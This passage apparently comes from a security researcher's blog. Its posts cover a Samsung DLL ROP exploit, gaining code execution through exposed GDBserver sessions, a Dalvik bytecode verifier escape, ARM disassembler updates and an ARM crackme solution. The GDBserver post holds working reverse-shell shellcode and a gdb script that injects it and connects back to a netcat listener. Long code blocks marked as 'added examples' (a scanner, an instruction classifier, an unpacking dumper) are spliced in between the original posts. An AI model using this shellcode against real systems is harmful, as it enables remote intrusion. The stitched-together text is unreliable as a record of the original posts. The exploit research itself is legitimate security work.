So yeah, that'll do for us :) Patch the 0x00000000 value with "base_wincrt + 0x00009558" and *ebp* is good to go. Finally, *esi* and *edi* have been handled correctly by mona. (Note that we don't have to worry about the value of eax in our custom "jmp esp" gadget, as this is executed right after the call to VirtualAlloc, and literally jumps to our shellcode.)

Having fixed the ROP chain, our final ROP chain including some MessageBox() shellcode, wrapped into a C file, looks like [the following](/wp-posts/samsung.c). (Woah, somebody added C dumping support to mona yesterday!) In case you're interested in the binary, to be run when the DLL is loaded into memory, it can be found [here](/wp-posts/samsung.exe).

## Conclusion

This was the first time I tried mona and I'm genuinely happy about it. Very easy to use and it did the job for me :) Ah yeah, so anyone with this particular Samsung software on his computer.. how do I even.. I guess it's just "another one of those".

# Turning arbitrary GDBserver sessions into RCE

Posted on December 2, 2013 by jbremer (https://jbremer.org/turning-arbitrary-gdbserver-sessions-into-rce/)

Today we'll see how we can turn an arbitrary GDBserver remote debugging session into remote code execution. First of all, let's assume gdbserver is run using the following command. We will also assume that the target architecture is Linux/x86, but you can port the technique to other architectures as needed.

```bash
$ gdbserver --remote-debug 0.0.0.0:1337 ./some_unknown_binary
```

What happens is that gdbserver will serve as many remote debugging sessions as possible while it's running. That is, we can have as many remote debugging sessions as we like, until the gdbserver is killed (but only one at a time.) This makes sense, because if we are debugging a target, then we don't want to restart gdbserver every time we hit "run" in gdb.

Let's assume one were to run gdbserver in a screen, to prevent accidental connection resets resulting in losing the gdbserver session (assuming we're ssh'ing into a remote server.) Exactly this happened to me; I recently found out that there were still two (of my) gdbservers running in a screen from when we were playing a CTF, almost *two months* ago.

Now anyone with the ip address and port number can attach to your gdbserver by doing the following.

```bash
$ gdb
(gdb) target extended-remote host:port
Remote debugging using host:port
(gdb) run
..
[Inferior 1 (process 42) exited normally]
```

In order not to make the RCE too easy, we're going to assume that we don't have any symbols of the remote binaries, and that all addresses are ASLR'd. In other words, educated guessing of "main" is useless, and we won't be able to do arbitrary function calls during debugging such as the following.

```bash
(gdb) call system("/bin/sh")
No symbol table is loaded.  Use the "file" command.
```

However, if we enter a breakpoint at an invalid address and run the debuggee, we get an error right before executing the very first instruction of the process. This looks roughly like the following :)

```bash
(gdb) break *0
Breakpoint 1 at 0x0
(gdb) run
Starting program:
warning: Could not load vsyscall page because no executable was specified
try using the "file" command first.
Warning:
Cannot insert breakpoint 1.
Error accessing memory address 0x0: Unknown error 18446744073709551615.

(gdb) info reg eip
eip            0xf7fe0850	0xf7fe0850
```

At this point the debuggee has been executed, and we're able to inspect and modify its state. We continue by removing our earlier breakpoint. Now it's time for the fun part.

### Reverse Shell Shellcode

After a bit of googling, I stumbled upon the [following shellcode](http://www.exploit-db.com/exploits/25497/). This shellcode connects to an ip address and port of your choosing, and executes /bin/sh with stdin, stdout, and stderr set to your socket. If we have netcat listening on the remote ip address and port, then it'll get a connection request upon execution of the shellcode, and we can use it to run arbitrary shell commands on the shellcode's machine, as if we had shell access. After an initial test, this shellcode seemed to work on my x86_64 machine running a 32-bit application. However, there's a small problem with this shellcode.
If we look closely at the shellcode, we notice the following.

```asm
804807b: 31 db    xor ebx,ebx
804807d: b3 02    mov bl,0x2
..
804808a: fe c3    inc bl
..
8048098: b1 03    mov cl,0x3
804809a <dupfd>:
804809a: fe c9    dec cl
804809c: b0 3f    mov al,0x3f
804809e: cd 80    int 0x80        ; system call
80480a0: 75 f8    jne 804809a
```

Investigating this system call further, we see that this is the [*dup2* system call](http://syscalls.kernelgrok.com/). However, the ebx register, or *old_fd*, seems to be constant here – namely three. (I figured this out while brushing my teeth..) This is the default fd if you open your first file descriptor in a program, which is something we cannot assume, and is definitely not the case when running the debuggee under gdbserver. (E.g., this shellcode fails if you open a file or socket before running it, because the fd of the socket allocated by our shellcode will be four for example, instead of three.)

If we look further, we see that the esi register contains the fd number returned from the *socket* system call. (Actually, this is the *socketcall* system call with *SOCKOP_socket* as operation, but that’s a minor detail specific to Linux/x86.)

```asm
8048075: cd 80    int 0x80        ; socket()
8048077: 89 c6    mov esi,eax     ; esi = fd
..
804808e: 6a 10    push 0x10       ; sizeof(sockaddr_in)
8048090: 51       push ecx        ; sockaddr_in *
8048091: 56       push esi        ; fd
8048092: 89 e1    mov ecx,esp
8048094: cd 80    int 0x80        ; connect()
```

Long story short, we want to preserve esi before the *connect* system call, and store it into ebx after the system call. Thus ebx will contain the fd of our socket, and the system calls to *dup2* will duplicate the correct fd into stdin, stdout, and stderr. The following snippet shows the updated shellcode. This is the shellcode that we’re going to use.

```asm
8048092: 89 e1    mov ecx,esp
+                 push esi        ; push fd
8048094: cd 80    int 0x80        ; connect()
+                 pop ebx         ; pop fd into ebx
8048096: 31 c9    xor ecx,ecx
8048098: b1 03    mov cl,0x3
```

## Running the Shellcode

All we have left to do is to patch the correct IP address and port into the shellcode, namely that of our listening netcat instance (e.g., running “nc -vvv -l 9001” on your favourite linux box), overwriting eip with the shellcode, and finally, running it.

For my exploit I’m using gdb’s Python bindings, as initially I had another technique in mind, which required a bit more scripting. Following is the final part of the code which generates the shellcode, overwrites it onto eip, and executes it. We have two *continue* statements at the end, as the shellcode will *execv* into /bin/sh, after which we’ll get an error that gdbserver can’t read the memory of eip anymore, so we have to instruct gdbserver to continue past that error.

```python
import gdb
import socket
import struct

# `netcat` is the (ip, port) tuple of the listening netcat instance, set
# earlier in the script (this is only the final part of it).

def reverse_shell((ip, port)):
    """Modified x86 reverse shell"""
    ip, port = socket.inet_aton(ip), struct.pack('>H', port)
    sc = \
        '31c031db31c931d2b066b301516a066a016a0289e1cd8089c6b06631dbb30268' \
        '000000006668ffff6653fec389e16a10515689e156cd805b31c9b103fec9b03f' \
        'cd8075f831c052686e2f7368682f2f626989e3525389e15289e2b00bcd80'
    # the placeholder port (0xffff) and ip (0x00000000) get patched in
    return sc.decode('hex').replace('\xff'*2, port).replace('\x00'*4, ip)

# write the shellcode byte by byte at eip, then run it
for idx, ch in enumerate(reverse_shell(netcat)):
    gdb.execute('set *(unsigned char *)($eip + %d) = %d' % (idx, ord(ch)))

gdb.execute('continue')
gdb.execute('continue')
```

## Final Exploit

The final exploit code can be found [here](https://github.com/jbremer/gdbservrce).

Execution of the code may look like the following. We’ll need three shells. (Optionally on different servers – do as you like.)

### Shell 1

```bash
$ gdbserver --remote-debug 0.0.0.0:1337 ./some_unknown_binary
..
```

### Shell 2

```bash
$ nc -vvv -l 31338
..
```

### Shell 3

```bash
$ vim gdbservrce.py  # Patch the ip addresses
$ gdb -x gdbservrce.py
..
```

### Enjoy Shell!

Now if we go back to Shell #2, we’ll see the following, and can run arbitrary shell commands.

```bash
skier@box:~$ nc -vvv -l 31338
Connection from 1.1.1.1 port 31338 [tcp/*] accepted
id
uid=1010(skier) gid=1011(skier) groups=1011(skier)
```

## Conclusion

This is a funny technique which basically tells you not to have gdbservers running around :)
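The conclusion above is the whole mitigation: don’t leave gdbservers running around. A check a defender can run for exactly that, as an added example that is not part of the post or of the gdbservrce repository: it parses the output of `ss -ltnp` on Linux and reports gdbserver sockets bound to anything other than loopback, which is what makes a forgotten session reachable from the network. The sample `ss` lines are constructed, and `scan_live_host` assumes `ss` from iproute2 is installed.

```python
"""Find gdbserver instances listening on non-loopback addresses."""
# Added example: not code from the post or the gdbservrce repository.
# Parses `ss -ltnp` output (Linux, iproute2); the SAMPLE lines are constructed.
import re
import subprocess

# "Local Address:Port" column: IPv4, "*" or a bracketed IPv6 address, then a port.
_ADDR_RE = re.compile(r"^(?P<addr>\*|\[[^\]]*\]|[^:\s]+):(?P<port>\d+|\*)$")
# One ("name",pid=N,fd=M) entry from the users:((...)) Process column.
_PROC_RE = re.compile(r'\("(?P<name>[^"]+)",pid=(?P<pid>\d+),fd=\d+\)')

LOOPBACK = {"127.0.0.1", "[::1]", "::1"}


def parse_ss_line(line):
    """Return (process name, pid, local address, port) for a LISTEN line, else None."""
    fields = line.split()
    if len(fields) < 5 or fields[0] != "LISTEN":
        return None                      # header line or a non-listening socket
    m = _ADDR_RE.match(fields[3])
    if m is None:
        return None
    procs = _PROC_RE.findall(line)
    if not procs:
        return None                      # no process info (needs root for other users)
    name, pid = procs[0]
    return name, int(pid), m.group("addr"), m.group("port")


def exposed_gdbservers(lines):
    """Return [(pid, addr, port)] for gdbserver sockets reachable from off-host."""
    hits = []
    for line in lines:
        parsed = parse_ss_line(line)
        if parsed is None:
            continue
        name, pid, addr, port = parsed
        if name != "gdbserver":
            continue
        if addr in LOOPBACK:
            continue                     # loopback only: not reachable remotely
        hits.append((pid, addr, port))
    return hits


def scan_live_host():
    """Run ss on this host (Linux only) and return the exposed gdbservers."""
    out = subprocess.run(["ss", "-ltnp"], capture_output=True,
                         text=True, check=True).stdout
    return exposed_gdbservers(out.splitlines())


# Constructed sample of `ss -ltnp` output, in the column layout ss prints.
SAMPLE = """\
State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process
LISTEN 0      128    0.0.0.0:22          0.0.0.0:*         users:(("sshd",pid=811,fd=3))
LISTEN 0      1      0.0.0.0:1337        0.0.0.0:*         users:(("gdbserver",pid=4242,fd=3))
LISTEN 0      1      127.0.0.1:2345      0.0.0.0:*         users:(("gdbserver",pid=4243,fd=3))
LISTEN 0      1      [::]:1338           [::]:*            users:(("gdbserver",pid=4244,fd=3))
"""

if __name__ == "__main__":
    for pid, addr, port in exposed_gdbservers(SAMPLE.splitlines()):
        print("gdbserver pid %d listening on %s:%s" % (pid, addr, port))
```

On the constructed sample the two gdbservers bound to `0.0.0.0` and `[::]` are reported and the one on `127.0.0.1` is not; the same rule applies to any debug server or other development listener you would rather keep behind an SSH tunnel.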
# Dalvik Research

Posted on October 23, 2013 by jbremer

Over the past couple of months I’ve been doing some research with regards to the Dalvik Virtual Machine, which is Android’s Java Virtual Machine implementation. Long story short, most Android applications are written in Java, which gets compiled to Dalvik Bytecode, and ends up in an APK file (a Zip file.)

As part of my research on Dalvik, I analyzed both the Dalvik VM itself and various applications – with a focus on their obfuscation techniques (which make analysis harder.) This research was presented at a couple of conferences.

[Back in June](http://jbremer.org/automated-deobfuscation-of-android-applications/) I already posted my slides for my [AthCon](http://athcon.org/) talk, which focused on deobfuscation. Then [a couple of weeks ago](https://twitter.com/rchiossi/status/386542792094519296), I did a similar talk together with [Rodrigo Chiossi](https://twitter.com/rchiossi) at [H2HC](http://h2hc.com.br/h2hc/pt/), featuring new and updated content, with a bit more focus on some of the techniques involved in creating new Dex files.

Finally I did a [talk](http://2013.hack.lu/index.php/List#Jurriaan_Bremer_-_Abusing_Dalvik_Beyond_Recognition) yesterday at [Hack.lu](http://2013.hack.lu/index.php/Main_Page), focusing on the Dalvik Virtual Machine itself. In this talk I presented an *“undocumented feature”* which I found in the way Android verifies Dex files, allowing an attacker to run arbitrary Dalvik Bytecode (which is normally not allowed – all code must normally be hardcoded and will be verified upon installation.) Following are the [slides](/wp-posts/AbusingDalvikBeyondRecognition.pdf) and the [Proof of Concept DvmEscape](/wp-posts/DvmEscape.apk) application.

As explained during the presentation, when running this application on your phone or emulator, you can type arbitrary Dalvik Bytecode and execute it by clicking on the “Run Dalvik” button. On the 30th slide of the presentation one can find two examples of valid Dalvik Bytecode, which, when run, will return with a fancy number. Unfortunately the dalvik.py disassembler mentioned in the slides is currently not open source, but for some more documentation on the Dalvik Bytecode there’s always the [Dalvik Bytecode reference](http://source.android.com/devices/tech/dalvik/dalvik-bytecode.html).

# Win32 Calc.exe Proof of Concept

If you want to run my win32 calc.exe Proof of Concept from the presentation you’ll have to do a couple of things:

- Install [CalcExe.apk](/wp-posts/CalcExe.apk) on the device
- Get the [adb_type.py](/wp-posts/adb_type.py) script, which “types” a string into the emulator
- Finally, type [payload.txt](/wp-posts/payload.txt) to the *DvmEscape* application, with the following command.

```bash
$ python adb_type.py $(cat payload.txt)
```

Note that typing the bytecode in to the emulator (or phone?!) takes roughly a minute. (No, there appears to be no support for using the clipboard with the emulator.) After that, just click on the button and calc should pop :)

For more information or questions, feel free to reach me at my new email address; [mail](mailto:me@jbremer.org).

# Dirkjan Strip Mailing List

Posted on September 1, 2013 by jbremer

This blogpost is mainly for **Dutch** (speaking) people (although I’ll still keep the blogpost in English.)
As I’m sure you’re all well-aware, Dirkjan is an [awesome](http://en.wikipedia.org/wiki/DirkJan) Dutch [comic](http://nl.wikipedia.org/wiki/DirkJan).

A couple of weeks ago I stumbled upon the [weekly feed](http://www.veronicamagazine.nl/entertainment/strips) from **Veronica**. Naturally, not wanting to check the website every week, I came up with a very simple **Dirkjan Feed** in the shape of a Mailing List. Of course this is not so much a mailing list, as it’s mostly one-way traffic, but it’s a fun way to keep up-to-date with **two Dirkjans a week**!

# Subscribe

Having said that, one can subscribe [here](http://jbremer.org/mailman/listinfo/dirkjan_jbremer.org) simply by filling out the **email address**. Other information is optional and not very interesting. (Yes, the website is a bit ugly – it’s the default mailing list manager.)

By subscribing you agree to being awesome (given you’re interested in reading Dirkjan) and the legal disclaimer on the bottom of this blogpost.

# Subscription

As I’ve only just set up the mailing list, I do not know exactly when new comics will arrive, but it looks like it will be every Tuesday. Please, **when subscribed**, do **not panic** – the comics will come eventually! (Just **wait**!)

# Legal stuff

I’m not affiliated with Veronica in any way. Any damage done through this Dirkjan Email Feed is at your own responsibility. I do not intend to damage Veronica in any way.

That’s all, and have fun reading Dirkjan. Dirkjan is awesome :)

# Darm Updates – More ARMv7, More Thumb

Posted on August 16, 2013 by jbremer

Darm is an [ARMv7](http://jbremer.org/darm) [disassembler](https://github.com/jbremer/darm) in C.
This blogpost is just a small update about the new stuff in **darm** from over the past couple of months, as there were some delays due to conferences and other stuff :)

# Thumb support

Most notably, Darm has recently gained *support* for the *Thumb instruction* set. Those of you familiar with ARMv7 know ARMv7 has two modes, namely, ARMv7 and Thumb. ARMv7 contains pretty much all the instructions you’d ever need, but Thumb is a small subset of the most used ARMv7 instructions, and Thumb instructions are only 16 bits in size, whereas ARMv7 instructions are 32 bits in size. Needless to say, Thumb allows for more compact code.

The API to disassemble Thumb instructions is as straightforward as the equivalent function for disassembling ARMv7 instructions. Furthermore, the two instruction set modes share the same data structure, *darm_t*, hence it is easily possible to write generic analysis routines without having to worry whether you’re analyzing ARMv7 or Thumb.

Currently, the C API looks roughly like the following. (Including the Thumb2 function; for more information on that, read further.)

```c
typedef struct _darm_t {
    ...
} darm_t;

// disassemble an armv7 instruction
int darm_armv7_disasm(darm_t *d, uint32_t w);

// disassemble a thumb instruction
int darm_thumb_disasm(darm_t *d, uint16_t w);

// disassemble a thumb2 instruction
int darm_thumb2_disasm(darm_t *d, uint16_t w, uint16_t w2);
```

# ARMv7 Improvements and Bug Fixes

ARMv7 has mostly had some bug fixes and a couple of new instructions. Nothing too spectacular, but it’s still improving as I find bugs and stumble upon new instructions.

# Coming up: Thumb2 support

Currently I’m working on getting support for the Thumb2 instruction set as well. As the Thumb instruction set is fairly limited with regards to the instructions that it can handle, as it’s only 16 bits in size, rather than 32 bits, there’s also the Thumb2 extension. Thumb2 features almost all (except for maybe a handful of instructions) of the instructions which are also available in the ARMv7 instruction set, hence allowing the optimized Thumb instructions to be mixed with Thumb2 instructions, which are, as ARMv7, 32 bits in size.

Having said that, if there are requests for instructions which you’d like to see sooner rather than later, please do contact me. At first I aim to support, let’s say, 90% of the binaries while keeping the amount of implemented instructions to a “minimum.” That is, I’ll focus on the most used Thumb2 instructions at first, and go for the complete instruction set later.

# Difference between ARMv7 and Thumb/Thumb2

A small explanation on ARMv7 vs Thumb/Thumb2.

When executing ARM instructions, the instruction will be executed as an ARMv7 instruction whenever the address is 4-byte aligned, and executed as either a Thumb or Thumb2 instruction, depending on its encoding, when the least significant bit is set. That is, when the address is not 4-byte aligned, but instead either addr+1 or addr+3 (with addr being a 4-byte aligned pointer), then the instruction is decoded as being either Thumb or Thumb2.

The instruction is either decoded as Thumb or Thumb2 depending on a couple of the most significant bits. When decoded as Thumb, one 16 bit word is fetched and executed. When decoded as Thumb2, a second 16 bit word is fetched and the instruction is decoded as if it were a 32 bit word.

At the [following lines of code](https://github.com/jbremer/darm/blob/f43765295cc560727bc8edeb911c80a04d254e92/thumb.c#L311) we can see the comparison of the upper 5 bits of the first 16 bit word. When the upper five bits equal either b11101 (binary 11101, or 29 in decimal), b11110, or b11111, then it is a Thumb2 instruction. Otherwise it’s a Thumb instruction.

Also note that at the moment there are two separate functions to disassemble Thumb and Thumb2 instructions, but don’t worry, in the future there’ll be a nice wrapper around them :)

# Contact

For questions etc, you know [where](https://twitter.com/skier_t) to [find me](mailto:jurriaanbremer@gmail.com).
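The two decisions described above, the execution-state bit of the address and the upper five bits of the first halfword, are small enough to show end to end. The following Python is an added example, not code from darm: it classifies halfwords exactly as the post describes, and walks a little-endian byte stream of constructed Thumb code to find instruction boundaries, refusing a Thumb2 prefix whose second halfword is missing rather than misreading a truncated buffer. The sample bytes are standard Thumb encodings (`nop`, `bx lr`, a 32-bit `bl`, `nop`); nothing about darm’s internals is assumed.

```python
"""Thumb vs Thumb2 halfword classification and instruction-boundary walking."""
# Added example for the ARMv7 vs Thumb/Thumb2 explanation; not darm code.
import struct

# Upper five bits of the first halfword that mark a 32-bit Thumb2 encoding.
THUMB2_PREFIXES = {0b11101, 0b11110, 0b11111}   # 29, 30, 31


def instruction_state(addr):
    """Branch-target rule: bit 0 clear means ARM, bit 0 set means Thumb/Thumb2."""
    return "thumb" if addr & 1 else "arm"


def is_thumb2(halfword):
    """True when the 16-bit halfword is the first half of a Thumb2 instruction."""
    return (halfword >> 11) in THUMB2_PREFIXES


def split_thumb_stream(data):
    """Return [(offset, size_in_bytes)] for a little-endian Thumb byte stream.

    Raises ValueError for an odd-length buffer or a Thumb2 prefix without its
    second halfword, so a truncated stream is never silently misdecoded.
    """
    if len(data) % 2:
        raise ValueError("Thumb stream must be a whole number of halfwords")
    boundaries = []
    off = 0
    while off < len(data):
        (hw,) = struct.unpack_from("<H", data, off)
        size = 4 if is_thumb2(hw) else 2
        if off + size > len(data):
            raise ValueError("Thumb2 prefix at offset %d lacks its second halfword" % off)
        boundaries.append((off, size))
        off += size
    return boundaries


# Constructed stream: nop (bf00), bx lr (4770), a 32-bit bl (f000 f800), nop.
SAMPLE = bytes.fromhex("00bf" "7047" "00f000f8" "00bf")

if __name__ == "__main__":
    for off, size in split_thumb_stream(SAMPLE):
        kind = "Thumb2" if size == 4 else "Thumb"
        print("offset %d: %d-byte %s instruction" % (off, size, kind))
```

Note that `0xE000` (an unconditional Thumb `b`) has upper bits 11100 and stays a 16-bit instruction, while `0xE800` tips over into the Thumb2 range; that one-bit difference is exactly the comparison the linked thumb.c lines make.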
# Solving ZCrackme#2: A Custom Emulator Approach

Posted on August 7, 2013 by jbremer

Due to my non-existent experience with using gdb under ARMv7, I decided to solve this challenge (the [ZCrackme #2 Challenge](http://blog.zimperium.com/arm-crackme-competition/)) using a [minimal ARMv7 emulator](https://github.com/jbremer/darmu) based on my [ARMv7 disassembler](https://github.com/jbremer/darm). (The original challenge can be found [here](/wp-posts/zcrackme-orig).)

## ZCrackme#2 Challenge

The binary itself is fairly interesting. It has a similar structure as the first ZCrackme challenge (not sure if there’s a blogpost about this one though.) Basically the ELF header is messed up, sections are missing, and the Entry Point points to a page filled with zeroes.

## INIT_ARRAY

Upon further inspection, using *readelf -a zcrackme2*, we find that the binary features the so-called *preinit-array*, *init-array*, and *fini-array* dynamic sections. These dynamic sections in fact represent a table of function addresses which are being called right before calling the real Entry Point (in the case of *preinit-array* and *init-array*) and called after calling the real Entry Point (in the case of *fini-array*.)

Looking up the various virtual offsets using IDA Pro, we find that only the *init-array* points to a real address, *loc_B0D8*. (The other table arrays, *preinit-array* and *fini-array*, are filled with zeroes and -1’s, which are nops – as in, these are not really called.)

We conclude that the actual entry point, or, the code that will be executed first, is located at this (**loc_B0D8**) address. From analyzing this routine in IDA Pro, we see some sort of decryption loop which overwrites some memory. Finally, after executing said decryption loop, an interesting system call is performed, namely #0xf0002. We find that this system call represents [__clear_cache](https://code.google.com/p/android/issues/detail?id=1803).

## __clear_cache

Basically, before the decrypted code can be executed, the code cache first has to be cleared for the particular address range in order to make sure that, when it is being executed, the new code will be executed, rather than any remaining code in the cache.

Similar tricks to this (decrypting code and clearing the cache) are performed a total of five times in this crackme.

So, having cleared the cache, the execution flow of the crackme now ends up in the decrypted code. Which, in turn, does some more rounds of decryption.

## Code Decryption

As mentioned, the crackme overwrites memory of the ELF file a total of five times. One of these “decryptions” in fact zeroes the first 100 bytes of the ELF header. As our goal is to dump a decrypted version of the crackme binary, this ELF header corruption does not help us (as IDA Pro wouldn’t understand the binary anymore.)

## Reconstructing a Decrypted Binary

As decryption is being followed by clearing the cache each time, we dump a new binary each time the cache is cleared. We do this by *applying* the changes to a copy of the original binary. That is, we read the decrypted data from emulator memory, and overwrite it into our original binary’s buffer. We do this for each decryption, except for the one iteration where the ELF header is zeroed out. (Note: the *__clear_cache* system call takes the starting address as first parameter and the end address as second parameter, hence it is trivial for us to find out which chunks of memory have been decrypted.)

## Scripting the Emulator

The [following script](/wp-posts/zcrackme.py), although a bit messy, represents the code to dump the binary a couple of times, which results in the final binary we’re interested in. The unpacked binary can be found [here](/wp-posts/zcrackme-unpacked). (Note that this unpacked binary may be inaccurate, with regards to global variables etc that have been updated during runtime but are not reflected in this version of the binary.)

Having successfully dumped the unpacked binary, it is now time for some static analysis on this binary. Do note that [our emulator](https://github.com/jbremer/darmu) should run fine on Windows and Linux (with a 32bit Python installed, that is.)

## The actual Crackme

Looking through the dumped binary, we find ourselves looking at *sub_87B4*, which is the function where the real stuff is happening (argc/argv parsing, that is.)

There are a couple of odd text messages which will be printed whenever incorrect information is entered on the commandline. Finally, we find some interesting function calls, of which one to *sub_8638*, which seems to decrypt the string buffer that can be found at *byte_9C35*, and another function which does a custom strcmp() against the argument on the commandline.

The string at *byte_9C35* is decrypted by xor’ing with 0x0d (decrypted to a buffer on the stack by *sub_8638*), resulting in the string **ZenCracking**. That said, we’ve solved the challenge..

## Conclusion

In case somebody has a working gdb for ARMv7 setup, this challenge is probably pretty easy (i.e., step through the various decryption iterations, and try to find the custom strcmp.) However, I had fun implementing the simple ARMv7 emulator, which is in fact pretty tricky, with all the conditional stuff going on.

Now a harder crackme? Let’s hope the next one does not involve xor “encryption” :p Zimperium’s response was, however, that having gotten to the xor-decryption part already shows enough knowledge and understanding of ARMv7, to which I agree :)
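The “Reconstructing a Decrypted Binary” step above is the reusable part of this write-up: hook the `__clear_cache(start, end)` call, copy exactly that range out of emulator memory into a copy of the original file, and skip the iteration that wipes the ELF header. The following Python is an added example of that hook, not the post’s zcrackme.py and not darmu code. It stands in for the emulator with a tiny flat memory model and replaces the crackme’s decryption loops with a constructed xor; the 0x8000 load base, the flat mapping (file offset = virtual address minus load base) and the 256-byte sample image are assumptions.

```python
"""Rebuild an unpacked image from emulator memory at every cache flush."""
# Added example for the "Reconstructing a Decrypted Binary" section; it is
# not the post's zcrackme.py nor part of darmu. LOAD_BASE, the flat
# va -> file-offset mapping and the sample image are assumptions.

ELF_HEADER_LEN = 100   # the post: one "decryption" zeroes the first 100 bytes
LOAD_BASE = 0x8000     # assumed: file offset = virtual address - LOAD_BASE


class Memory:
    """Minimal stand-in for emulator memory: the file mapped flat at LOAD_BASE."""

    def __init__(self, image, base=LOAD_BASE):
        self.base = base
        self.buf = bytearray(image)

    def read(self, va, size):
        off = va - self.base
        return bytes(self.buf[off:off + size])

    def xor_region(self, va, size, key):
        """Constructed decryption step standing in for the crackme's xor loops."""
        off = va - self.base
        for i in range(off, off + size):
            self.buf[i] ^= key

    def zero_region(self, va, size):
        """The anti-dumping step: the crackme zeroes its own ELF header."""
        off = va - self.base
        self.buf[off:off + size] = bytes(size)


class Dumper:
    """Keeps a copy of the original file and applies decrypted ranges to it."""

    def __init__(self, original, base=LOAD_BASE):
        self.image = bytearray(original)
        self.base = base
        self.applied = []          # (start, end) ranges copied so far

    def on_clear_cache(self, mem, start, end):
        """Hook for __clear_cache(start, end); returns True if the range was applied.

        The two syscall arguments delimit exactly the freshly decrypted memory,
        so that is all we copy. A range covering the ELF header is the
        header-wiping iteration and is skipped on purpose.
        """
        lo = start - self.base
        if lo < ELF_HEADER_LEN:
            return False
        self.image[lo:lo + (end - start)] = mem.read(start, end - start)
        self.applied.append((start, end))
        return True

    def dump(self):
        return bytes(self.image)


def constructed_original():
    """A 256-byte stand-in for the packed file: ELF magic, then byte i == i."""
    return b"\x7fELF" + bytes(range(4, 256))


def run_constructed_unpack():
    """Play a decrypt-then-flush sequence against the model.

    Returns (dumped_image, applied_ranges).
    """
    original = constructed_original()
    mem = Memory(original)
    dumper = Dumper(original)

    # Iteration 1: a code region is decrypted, then the cache is flushed.
    mem.xor_region(LOAD_BASE + 0x80, 0x20, 0x0d)
    dumper.on_clear_cache(mem, LOAD_BASE + 0x80, LOAD_BASE + 0xa0)

    # Iteration 2: the ELF header is zeroed; the hook must leave the dump alone.
    mem.zero_region(LOAD_BASE, ELF_HEADER_LEN)
    dumper.on_clear_cache(mem, LOAD_BASE, LOAD_BASE + ELF_HEADER_LEN)

    # Iteration 3: another region is decrypted with a different key.
    mem.xor_region(LOAD_BASE + 0xc0, 0x10, 0x5a)
    dumper.on_clear_cache(mem, LOAD_BASE + 0xc0, LOAD_BASE + 0xd0)

    return dumper.dump(), dumper.applied


if __name__ == "__main__":
    image, applied = run_constructed_unpack()
    print("applied ranges:", [(hex(s), hex(e)) for s, e in applied])
    print("header intact:", image[:4] == b"\x7fELF")
```

The same caveat the post gives applies to a dump produced this way: only the ranges the crackme flushed are copied, so data the code updated without a cache flush (globals written at runtime) is not reflected in the reconstructed file.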